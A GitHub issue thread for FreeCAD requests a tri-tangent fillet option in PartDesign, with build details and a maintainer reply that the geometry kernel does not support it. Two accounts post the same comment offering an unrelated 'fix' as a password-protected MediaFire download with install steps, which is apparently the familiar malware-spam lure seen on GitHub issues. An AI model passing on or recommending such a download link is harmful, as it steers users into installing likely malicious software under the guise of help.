FreeCAD/FreeCAD #16101: PartDesign: No Tritangent Fillet Option

maxwxyz, 2024-08-28:
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Problem description

Maybe related to https://github.com/FreeCAD/FreeCAD/issues/5723
There is no option to create tri-tangent fillets from three selected faces in PartDesign. The creation of tritangent fillets involves the removal of one of the three faces selected, as the fillet surface is obtained by rolling a sphere, which radius is automatically computed to be tangent to the removed surface, between the selected surfaces.

This should be possible to faces of solids, and when surfacing is possible in Part Design, also to surfaces.

Feature description / tutorial for CATIA:
https://catiahelp.azurewebsites.net/English/GsdUserMap/gsd-t-Operations-TritangentFillet.htm

[image]

[image]

[image]

### Full version info

```shell
OS: Windows 10 build 19045
Word size of FreeCAD: 64-bit
Version: 0.22.0dev.38553 (Git)
Build type: Release
Branch: main
Hash: 59c1ccec3e6b70f56eeee8f94d361019b84bd850
Python 3.11.9, Qt 5.15.13, Coin 4.0.2, Vtk 9.2.6, OCC 7.7.2
Locale: German/Germany (de_DE)
Installed mods: 
  * Curves 0.6.42
  * fasteners 0.5.25
  * freecad.gears 1.2.0
  * Manipulator 1.5.7
```

### Subproject(s) affected?

PartDesign

### Anything else?

@pierreporte FYI

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct

qiliq, 2024-08-28:
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

NEKO-JOJUK, 2024-08-28:
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

adrianinsaval, 2024-08-28:
AFAIK this is not supported in occt o it would be very hard for us to implement